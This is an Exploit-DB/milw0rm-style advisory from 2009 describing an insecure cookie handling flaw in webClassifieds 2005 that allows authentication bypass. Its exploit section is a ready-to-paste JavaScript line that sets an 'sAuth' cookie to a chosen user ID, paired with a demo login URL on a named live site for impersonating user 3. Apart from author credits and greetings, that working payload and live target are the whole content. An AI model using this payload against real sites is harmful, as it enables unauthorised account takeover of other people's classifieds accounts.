webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling

EDB-ID:

8486

CVE:



Platform:

PHP

Published:

2009-04-20

[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
 [~]Tybe:webClassifieds© 2005 Insecure Cookie Handling Vulnerability
  
 [~]Vendor: www.webscribble.com
  
 [~]Software: webClassifieds© 2005
  
 [~]author: ThE g0bL!N
  
  
 [~] Home: WWW.h4ckf0ru.com
  

[~] -----------------------------{ Iam MuSlIm}------------------------------
  
  
 [~] Exploit:
  
javascript:dcocument.cookie="sAuth=[id];path=/";
  
[~]login 4 d3m0:
  
http://www.towpartners.com/classifieds/index.php?page=sign_in
 
javascript:document.cookie="sAuth=3;path=/";
[~]--------------------------------------------------------------------------------
 
  [~] Greetz tO:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH
  [~]
  [~]
  [~]
  [~]
 
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2009-04-20]